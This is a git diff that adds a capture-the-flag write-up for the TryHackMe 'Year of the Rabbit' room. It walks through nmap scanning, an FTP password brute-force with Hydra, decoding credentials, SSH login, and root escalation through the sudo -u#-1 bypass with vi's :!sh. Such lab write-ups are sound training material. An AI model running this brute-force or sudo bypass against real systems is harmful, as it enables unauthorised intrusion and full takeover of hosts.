diff --git a/TryHackMe/YearOfRabbit.md b/TryHackMe/YearOfRabbit.md
new file mode 100644
index 0000000..6a9769c
--- /dev/null
+++ b/TryHackMe/YearOfRabbit.md
@@ -0,0 +1,247 @@
+# TryHackMe-YearOfRabbit
+
+>Abdullah Rizwan | 09:12 PM , 18th October
+
+## NMAP
+
+```
+Nmap scan report for 10.10.20.206
+Host is up (0.17s latency).
+Not shown: 997 closed ports
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.2
+22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
+| ssh-hostkey:
+| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
+| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
+| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
+|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
+80/tcp open http Apache httpd 2.4.10 ((Debian))
+|_http-server-header: Apache/2.4.10 (Debian)
+|_http-title: Apache2 Debian Default Page: It works
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
+
+```
+## PORT 80
+
+Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video.
+
+## Burpsuite
+
+Intercept the request on `/sup3r_s3cret_fl4g/`
+
+
+
+
+
+Now visiting the page `/WExYY2Cv-qU`
+
+We will find an image
+
+running `strings` on image
+
+```
+Eh, you've earned this. Username for FTP is ftpuser
+One of these is the password:
+Mou+56n%QK8sr
+1618B0AUshw1M
+A56IpIl%1s02u
+vTFbDzX9&Nmu?
+FfF~sfu^UQZmT
+8FF?iKO27b~V0
+ua4W~2-@y7dE$
+3j39aMQQ7xFXT
+Wb4--CTc4ww*-
+u6oY9?nHv84D&
+0iBp4W69Gr_Yf
+TS*%miyPsGV54
+C77O3FIy0c0sd
+O14xEhgg0Hxz1
+5dpv#Pr$wqH7F
+1G8Ucoce1+gS5
+0plnI%f0~Jw71
+0kLoLzfhqq8u&
+kS9pn5yiFGj6d
+zeff4#!b5Ib_n
+rNT4E4SHDGBkl
+KKH5zy23+S0@B
+3r6PHtM4NzJjE
+gm0!!EC1A0I2?
+HPHr!j00RaDEi
+7N+J9BYSp4uaY
+PYKt-ebvtmWoC
+3TN%cD_E6zm*s
+eo?@c!ly3&=0Z
+nR8&FXz$ZPelN
+eE4Mu53UkKHx#
+86?004F9!o49d
+SNGY0JjA5@0EE
+trm64++JZ7R6E
+3zJuGL~8KmiK^
+CR-ItthsH%9du
+yP9kft386bB8G
+A-*eE3L@!4W5o
+GoM^$82l&GA5D
+1t$4$g$I+V_BH
+0XxpTd90Vt8OL
+j0CN?Z#8Bp69_
+G#h~9@5E5QA5l
+DRWNM7auXF7@j
+Fw!if_=kk7Oqz
+92d5r$uyw!vaE
+c-AA7a2u!W2*?
+zy8z3kBi#2e36
+J5%2Hn+7I6QLt
+gL$2fmgnq8vI*
+Etb?i?Kj4R=QM
+7CabD7kwY7=ri
+4uaIRX~-cY6K4
+kY1oxscv4EB2d
+k32?3^x1ex7#o
+ep4IPQ_=ku@V8
+tQxFJ909rd1y2
+5L6kpPR5E2Msn
+65NX66Wv~oFP2
+LRAQ@zcBphn!1
+V4bt3*58Z32Xe
+ki^t!+uqB?DyI
+5iez1wGXKfPKQ
+nJ90XzX&AnF5v
+7EiMd5!r%=18c
+wYyx6Eq-T^9#@
+yT2o$2exo~UdW
+ZuI-8!JyI6iRS
+PTKM6RsLWZ1&^
+3O$oC~%XUlRO@
+KW3fjzWpUGHSW
+nTzl5f=9eS&*W
+WS9x0ZF=x1%8z
+Sr4*E4NT5fOhS
+hLR3xQV*gHYuC
+4P3QgF5kflszS
+NIZ2D%d58*v@R
+0rJ7p%6Axm05K
+94rU30Zx45z5c
+Vi^Qf+u%0*q_S
+1Fvdp&bNl3#&l
+zLH%Ot0Bw&c%9
+```
+
+## Hydra
+```
+hydra -l ftpuser -P passwords.txt ftp://10.10.20.206 -t 4
+Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01
+[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
+[DATA] attacking ftp://10.10.20.206:21/
+[21][ftp] host: 10.10.20.206 login: ftpuser password: 5iez1wGXKfPKQ
+[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
+1 of 1 target successfully completed, 1 valid password found
+Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03
+```
+
+## FTP
+
+```
+root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp 10.10.20.206
+Connected to 10.10.20.206.
+220 (vsFTPd 3.0.2)
+Name (10.10.20.206:root): ftpuser
+331 Please specify the password.
+Password:
+230 Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls -la
+200 PORT command successful. Consider using PASV.
+150 Here comes the directory listing.
+drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
+drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
+-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
+226 Directory send OK.
+ftp>
+
+```
+On getting `Eli's_Creds.txt` we will find brainfuck language
+
+```
++++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
+--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
+++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
++++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
+]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
+++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
+--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
++<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
+++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
+<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
+<]>+. <+++[ ->--- <]>-- ---.- ----. <
+```
+`https://www.dcode.fr/brainfuck-language`
+
+on decoding it
+
+```
+User: eli
+Password: DSpDiM1wAEwid
+```
+This may be the ssh password for `eli`
+
+## SSH
+
+```
+root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@10.10.20.206
+The authenticity of host '10.10.20.206 (10.10.20.206)' can't be established.
+ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added '10.10.20.206' (ECDSA) to the list of known hosts.
+eli@10.10.20.206's password:
+
+
+1 new message
+Message from Root to Gwendoline:
+
+"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
+
+END MESSAGE
+
+
+
+
+eli@year-of-the-rabbit:~$
+
+
+```
+
+
+```
+eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null
+/usr/games/s3cr3t
+```
+
+```
+ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
+Your password is awful, Gwendoline.
+It should be at least 60 characters long! Not just MniVCQVhQHUNI
+Honestly!
+
+Yours sincerely
+ -Root
+
+```
+## Previlege Escalation
+
+```
+sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
+```
+on the vim editor
+
+:!sh
+
+```
+# bash
+```
\ No newline at end of file